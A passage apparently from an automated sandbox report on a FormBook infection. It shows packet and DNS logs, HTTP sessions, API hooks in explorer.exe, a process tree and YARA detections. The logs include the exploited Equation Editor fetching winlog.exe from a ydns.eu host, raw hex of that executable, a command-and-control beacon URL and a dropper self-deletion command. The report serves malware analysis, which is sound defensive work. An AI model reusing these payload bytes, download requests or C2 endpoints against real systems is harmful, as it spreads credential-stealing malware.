                              Nov 20, 2020 11:27:52.720853090 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720870018 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720895052 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720902920 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.720909119 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.720927954 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.720944881 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720962048 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720978975 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.721003056 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.721015930 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.721025944 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.721046925 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.721067905 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.721088886 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.721101046 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.721112013 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.721131086 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.721148968 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.721174002 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.721179962 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.721187115 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.721205950 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.755081892 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.758585930 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:53.475512981 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:29:22.411344051 CET4916880192.168.2.22172.67.181.41
                              Nov 20, 2020 11:29:22.433445930 CET8049168172.67.181.41192.168.2.22
                              Nov 20, 2020 11:29:22.433530092 CET4916880192.168.2.22172.67.181.41
                              Nov 20, 2020 11:29:22.433763027 CET4916880192.168.2.22172.67.181.41
                              Nov 20, 2020 11:29:22.455665112 CET8049168172.67.181.41192.168.2.22
                              Nov 20, 2020 11:29:22.465790987 CET8049168172.67.181.41192.168.2.22
                              Nov 20, 2020 11:29:22.465945005 CET8049168172.67.181.41192.168.2.22
                              Nov 20, 2020 11:29:22.466002941 CET4916880192.168.2.22172.67.181.41
                              Nov 20, 2020 11:29:22.466022015 CET4916880192.168.2.22172.67.181.41
                              Nov 20, 2020 11:29:22.488257885 CET8049168172.67.181.41192.168.2.22

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 20, 2020 11:27:50.227308035 CET5219753192.168.2.228.8.8.8
                              Nov 20, 2020 11:27:50.271962881 CET53521978.8.8.8192.168.2.22
                              Nov 20, 2020 11:29:22.352675915 CET5309953192.168.2.228.8.8.8
                              Nov 20, 2020 11:29:22.402642012 CET53530998.8.8.8192.168.2.22

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Nov 20, 2020 11:27:50.227308035 CET192.168.2.228.8.8.80x746fStandard query (0)thdyneverwalkachinese2loneinlifekthfnp.ydns.euA (IP address)IN (0x0001)
                              Nov 20, 2020 11:29:22.352675915 CET192.168.2.228.8.8.80xa14dStandard query (0)www.segredosdocopywriting.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Nov 20, 2020 11:27:50.271962881 CET8.8.8.8192.168.2.220x746fNo error (0)thdyneverwalkachinese2loneinlifekthfnp.ydns.eu103.141.138.87A (IP address)IN (0x0001)
                              Nov 20, 2020 11:29:22.402642012 CET8.8.8.8192.168.2.220xa14dNo error (0)www.segredosdocopywriting.com172.67.181.41A (IP address)IN (0x0001)
                              Nov 20, 2020 11:29:22.402642012 CET8.8.8.8192.168.2.220xa14dNo error (0)www.segredosdocopywriting.com104.24.99.174A (IP address)IN (0x0001)
                              Nov 20, 2020 11:29:22.402642012 CET8.8.8.8192.168.2.220xa14dNo error (0)www.segredosdocopywriting.com104.24.98.174A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
                              • www.segredosdocopywriting.com

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.2249167103.141.138.8780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              TimestampkBytes transferredDirectionData
                              Nov 20, 2020 11:27:50.506499052 CET0OUTGET /chnsfrnd2/winlog.exe HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
                              Connection: Keep-Alive
                              Nov 20, 2020 11:27:50.727421999 CET2INHTTP/1.1 200 OK
                              Date: Fri, 20 Nov 2020 10:27:54 GMT
                              Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                              Last-Modified: Thu, 19 Nov 2020 20:54:09 GMT
                              ETag: "eb000-5b47bede9f95e"
                              Accept-Ranges: bytes
                              Content-Length: 962560
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/x-msdownload
                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 db b6 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 2e 0c 00 00 80 02 00 00 00 00 00 ee 4c 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 4c 0c 00 4b 00 00 00 00 60 0c 00 b4 7d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 2c 0c 00 00 20 00 00 00 2e 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 7d 02 00 00 60 0c 00 00 7e 02 00 00 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0e 00 00 02 00 00 00 ae 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4c 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 52 00 00 3c 40 00 00 03 00 00 00 f4 00 00 06 0c 93 00 00 89 b9 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 3f 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 18 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 2a 02 28 04 00 00 06 20 00 00 00 00 16 3a e0 ff ff ff 26 20 00 00 00 00 38 d5 ff ff ff 00 13 30 03 00 4d 00 00 00 02 00 00 11 20 01 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 02 00 00 00 22 00 00 00 05 00 00 00 38 1d 00 00 00 73 22 00 00 06 13 00 20 00 00 00 00 28 05 00 00 06 3a d8 ff ff ff 26 38 ce ff ff ff 2a 11 00 6f 19 00 00 06 38 f3 ff ff ff 00 00 00 13 30 03 00 b1 00 00 00 01 00 00 11 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 65 00 00 00 45 00 00 00 25 00 00 00 64 00 00 00 05 00 00 00 38 60 00 00 00 02 7b 01 00 00 04 28 07 00 00 06 20 00 00 00 00 28 05 00 00 06 3a c8 ff ff ff 26 38 be ff ff ff 03 39 3a 00 00 00 20 01 00 00 00 28 05 00 00 06 3a ad ff ff ff 26 20 01 00 00 00 38 a2 ff ff ff 02 7b 01 00 00 04 3a b5 ff ff ff 38 00 00 00 00 38 0b 00 00 00 20 04 00 00 00 38 83 ff ff ff 2a 02 03 28 02 00 00 0a 20 03 00 00 00 28 05 00 00 06 3a 6c ff ff ff 26 20 01 00 00 00 38 61 ff ff ff 00 00 00 13 30 04 00 35 02 00 00 01 00 00 11 20 08 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 10 00 00 00 a7 00 00 00 82 01 00 00 1f 01 00 00 af 01 00 00 cd 00 00 00 4b
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELG_.L `@ @LK`} H.text, . `.rsrc}`~0@@.reloc@BLHR<@0?(88E8*( :& 80M 8E"8s" (:&8*o80 8EeE%d8`{( (:&89: (:& 8{:88 8*( (:l& 8a05 8EK
                              Nov 20, 2020 11:27:50.727463961 CET3INData Raw: 01 00 00 09 01 00 00 1a 00 00 00 05 00 00 00 cc 00 00 00 43 00 00 00 2e 00 00 00 93 01 00 00 54 00 00 00 92 00 00 00 f3 00 00 00 38 a2 00 00 00 02 73 03 00 00 0a 7d 02 00 00 04 20 07 00 00 00 38 a1 ff ff ff 02 28 08 00 00 06 20 06 00 00 00 fe 0e
                              Data Ascii: C.T8s} 8( 8rpo 8x( 8g s( 8H{ s(8{rp(8rp( (:& 8
                              Nov 20, 2020 11:27:50.727499008 CET4INData Raw: 11 03 3a 86 00 00 00 20 05 00 00 00 38 af ff ff ff 02 28 2b 00 00 06 28 18 00 00 06 20 06 00 00 00 38 9a ff ff ff 02 02 28 17 00 00 06 72 83 00 00 70 72 87 00 00 70 28 2d 00 00 06 28 18 00 00 06 20 01 00 00 00 28 23 00 00 06 3a 70 ff ff ff 26 38
                              Data Ascii: : 8(+( 8(rprp(-( (#:p&8f8 (#:V&8L (,8 83Y 8# ($9& 80 8EQ2!
                              Nov 20, 2020 11:27:50.727560997 CET6INData Raw: ff ff 20 b6 73 01 00 13 01 20 03 00 00 00 38 43 ff ff ff 00 13 30 03 00 ca 00 00 00 06 00 00 11 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 06 00 00 00 40 00 00 00 0f 00 00 00 05 00 00 00 2f 00 00 00 62 00 00 00 41 00 00 00 38 3b 00
                              Data Ascii: s 8C0 8E@/bA8;878pX (A:& 8 o 8* o?2 (B9&8}*(' (A:j&8` T] T@ 8H(
                              Nov 20, 2020 11:27:50.947706938 CET7INData Raw: 0a 2a 2e 00 fe 09 00 00 28 27 00 00 0a 2a 26 7e 09 00 00 04 14 fe 01 2a 00 00 1a 7e 09 00 00 04 2a 00 1e 02 28 1d 00 00 0a 2a 13 30 03 00 ce 00 00 00 06 00 00 11 20 02 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 06 00 00 00 2a 00 00 00 05
                              Data Ascii: *.('*&~*~*(*0 8E*;Xx8%8 8*(` 8 K?B8 K (a:&8*X (b9v& 8k kg] kg@
                              Nov 20, 2020 11:27:50.947762012 CET9INData Raw: 00 00 00 7a 00 00 00 1c 00 00 00 38 38 00 00 00 11 01 20 d2 92 00 00 5d 20 d2 92 00 00 40 42 00 00 00 38 3c 00 00 00 11 01 20 fa 4b 00 00 3f dd ff ff ff 20 00 00 00 00 28 75 00 00 06 39 ac ff ff ff 26 38 a2 ff ff ff 2a 38 d9 ff ff ff 20 01 00 00
                              Data Ascii: z88 ] @B8< K? (u9&8*8 (u9&8*(' 8yX 8i K (t:S&8I(*&~*~*(*(*(*(*0
                              Nov 20, 2020 11:27:50.947798967 CET10INData Raw: 28 1d 00 00 0a 2a 1e 02 28 1d 00 00 0a 2a 1e 02 28 1d 00 00 0a 2a 13 30 03 00 cf 00 00 00 06 00 00 11 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 06 00 00 00 05 00 00 00 52 00 00 00 21 00 00 00 9f 00 00 00 92 00 00 00 71 00 00 00 38
                              Data Ascii: (*(*(*0 8ER!q8 _] _@| 8 e (9& 8X 88 (:}& 8r e? (:W&8M*(8*
                              Nov 20, 2020 11:27:50.947834015 CET11INData Raw: 00 20 01 00 00 00 28 a9 00 00 06 3a c6 ff ff ff 26 38 bc ff ff ff 11 01 20 ab 66 01 00 5d 20 ab 66 01 00 40 0b 00 00 00 20 02 00 00 00 38 a4 ff ff ff 2a 11 01 28 ab 00 00 06 20 03 00 00 00 38 92 ff ff ff 11 01 17 58 13 01 38 01 00 00 00 2a 11 01
                              Data Ascii: (:&8 f] f@ 8*( 8X8* o< (9k&8a8 (:Q& 8F o (90& 8%(*&~*~*.('*(*(*(
                              Nov 20, 2020 11:27:50.947875977 CET13INData Raw: 00 38 7f 00 00 00 11 01 17 58 13 01 38 53 00 00 00 2a 11 01 28 27 00 00 0a 20 05 00 00 00 28 c3 00 00 06 3a bc ff ff ff 26 38 b2 ff ff ff 38 31 00 00 00 20 00 00 00 00 28 c4 00 00 06 39 a2 ff ff ff 26 38 98 ff ff ff 20 21 62 01 00 13 01 20 01 00
                              Data Ascii: 8X8S*(' (:&881 (9&8 !b (9&8| !b? (9e&8[ -&] -&@{ 8C*0 8E>=_+8 U<,
                              Nov 20, 2020 11:27:50.947932959 CET14INData Raw: 00 00 38 7b 00 00 00 20 4b 30 01 00 13 01 20 03 00 00 00 fe 0e 00 00 38 aa ff ff ff 11 01 17 58 13 01 20 01 00 00 00 28 dd 00 00 06 3a 99 ff ff ff 26 38 8f ff ff ff 38 b4 ff ff ff 20 02 00 00 00 38 84 ff ff ff 11 01 20 4b 30 01 00 3c 2f 00 00 00
                              Data Ascii: 8{ K0 8X (:&88 8 K0</ (:i&8_8 (9O&8E**(' 86(*&~*~*(*(*(*0 8E'
                              Nov 20, 2020 11:27:50.948026896 CET16INData Raw: 00 11 38 31 00 00 00 fe 0c 00 00 45 02 00 00 00 2a 00 00 00 2b 00 00 00 38 25 00 00 00 16 28 28 00 00 0a 20 01 00 00 00 28 f6 00 00 06 39 d9 ff ff ff 26 38 cf ff ff ff 28 29 00 00 0a 38 db ff ff ff 2a 73 01 00 00 06 28 2a 00 00 0a 20 00 00 00 00
                              Data Ascii: 81E*+8%(( (9&8()8*s(* (:& 8&~*~*(*0 8EFVP*8Arp\(+o,s- 8 (


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.2249168172.67.181.4180C:\Windows\explorer.exe
                              TimestampkBytes transferredDirectionData
                              Nov 20, 2020 11:29:22.433763027 CET1014OUTGET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1
                              Host: www.segredosdocopywriting.com
                              Connection: close
                              Data Raw: 00 00 00 00 00 00 00
                              Data Ascii:
                              Nov 20, 2020 11:29:22.465790987 CET1015INHTTP/1.1 301 Moved Permanently
                              Date: Fri, 20 Nov 2020 10:29:22 GMT
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: max-age=3600
                              Expires: Fri, 20 Nov 2020 11:29:22 GMT
                              Location: https://www.segredosdocopywriting.com/ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98
                              cf-request-id: 0686cca59a00007335491ca000000001
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Bf3j%2F1vQ%2Fjjmdm9TXlDCBJxYSVb4L5eqm54WB1%2Frab9jM5yqbhhBUV8xSjWCdkEizKcLUtPAfa3su3wCTHIj9Ot81X5eUax7HwwK1A0diXxwju%2BnK8yn1abAv1MRLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 5f517d4f5f567335-AMS
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Code Manipulations

                              User Modules

                              Hook Summary

                              Function NameHook TypeActive in Processes
                              PeekMessageAINLINEexplorer.exe
                              PeekMessageWINLINEexplorer.exe
                              GetMessageWINLINEexplorer.exe
                              GetMessageAINLINEexplorer.exe

                              Processes

                              Process: explorer.exe, Module: USER32.dll
                              Function NameHook TypeNew Data
                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE5
                              PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE5
                              GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE5
                              GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE5

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: EXCEL.EXE PID: 2268 Parent PID: 584

                              General

                              Start time:11:26:58
                              Start date:20/11/2020
                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                              Imagebase:0x13f780000
                              File size:27641504 bytes
                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: EQNEDT32.EXE PID: 2412 Parent PID: 584

                              General

                              Start time:11:27:18
                              Start date:20/11/2020
                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                              Imagebase:0x400000
                              File size:543304 bytes
                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: vbc.exe PID: 2924 Parent PID: 2412

                              General

                              Start time:11:27:22
                              Start date:20/11/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\Public\vbc.exe'
                              Imagebase:0x30000
                              File size:962560 bytes
                              MD5 hash:221E46C09EB3440BEB5A2256211C3262
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 33%, ReversingLabs
                              Reputation:low

                              Chronological Activities

                              Analysis Process: vbc.exe PID: 3024 Parent PID: 2924

                              General

                              Start time:11:27:54
                              Start date:20/11/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Users\Public\vbc.exe
                              Imagebase:0x30000
                              File size:962560 bytes
                              MD5 hash:221E46C09EB3440BEB5A2256211C3262
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Chronological Activities

                              Analysis Process: vbc.exe PID: 3020 Parent PID: 2924

                              General

                              Start time:11:27:55
                              Start date:20/11/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Users\Public\vbc.exe
                              Imagebase:0x30000
                              File size:962560 bytes
                              MD5 hash:221E46C09EB3440BEB5A2256211C3262
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Chronological Activities

                              Analysis Process: vbc.exe PID: 2948 Parent PID: 2924

                              General

                              Start time:11:27:55
                              Start date:20/11/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\Public\vbc.exe
                              Imagebase:0x30000
                              File size:962560 bytes
                              MD5 hash:221E46C09EB3440BEB5A2256211C3262
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:low

                              Chronological Activities

                              Analysis Process: explorer.exe PID: 1388 Parent PID: 2948

                              General

                              Start time:11:27:57
                              Start date:20/11/2020
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:
                              Imagebase:0xffca0000
                              File size:3229696 bytes
                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Chronological Activities

                              Analysis Process: cmd.exe PID: 2232 Parent PID: 1388

                              General

                              Start time:11:28:07
                              Start date:20/11/2020
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\cmd.exe
                              Imagebase:0x4a550000
                              File size:302592 bytes
                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:high

                              Chronological Activities

                              Analysis Process: cmd.exe PID: 2224 Parent PID: 2232

                              General

                              Start time:11:28:11
                              Start date:20/11/2020
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                              Imagebase:0x4a550000
                              File size:302592 bytes
                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Disassembly

                              Code Analysis

                              Reset < >

                                Analysis Process: vbc.exe PID: 2924 Parent PID: 2412 vbc.exeCOMMON

                                Executed Functions

                                Function 00381E00, Relevance: 3.2, Strings: 2, Instructions: 674COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: TVJm$TVJm
                                • API String ID: 0-795160959
                                • Opcode ID: 5b5fb20380c4bea2e38664509415d894f40cec5769e7d40736e5b505ae1373f9
                                • Instruction ID: 8acc5cbff72a4551569e6d10b29bd1e931a1f2fb53c414bd8d85a20a6b74fc65
                                • Opcode Fuzzy Hash: 5b5fb20380c4bea2e38664509415d894f40cec5769e7d40736e5b505ae1373f9
                                • Instruction Fuzzy Hash: 83524B35A006149FCB45DFA8C984E59BBB2FF88304F1685E8E50A9B276CB31EC95DF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0038A118, Relevance: 1.8, APIs: 1, Instructions: 299COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fcfd7586c40adb5104f36af6b355f4e2b668a6aa4be9668acec85d931e9c7d98
                                • Instruction ID: 771c388b338639c470f022e6de0e8bae97bca1476e00e2777a1d763e72ab29c7
                                • Opcode Fuzzy Hash: fcfd7586c40adb5104f36af6b355f4e2b668a6aa4be9668acec85d931e9c7d98
                                • Instruction Fuzzy Hash: 9AB1BD71D047188FEF22DFA9C8447EEBBB2BF44304F1585AAD808A7290D7749985CF92
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0038BA60, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                Download Yara Rule
                                APIs
                                • GetUserNameA.ADVAPI32(00000000), ref: 0038BBAC
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                • Opcode ID: 39cc92c6bf018c2b92a6f5f8101348bcd3c775cf40952a6207694859c22d34e2
                                • Instruction ID: 32f4f7a074150fc1a21fb24d07417c8941b75249eacae7be8d904eec075b6834
                                • Opcode Fuzzy Hash: 39cc92c6bf018c2b92a6f5f8101348bcd3c775cf40952a6207694859c22d34e2
                                • Instruction Fuzzy Hash: 8F513070E003498FDB15DFA9C894BAEFBF5AF48304F258069D816AB395DB74A844CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0038A1C8, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule
                                APIs
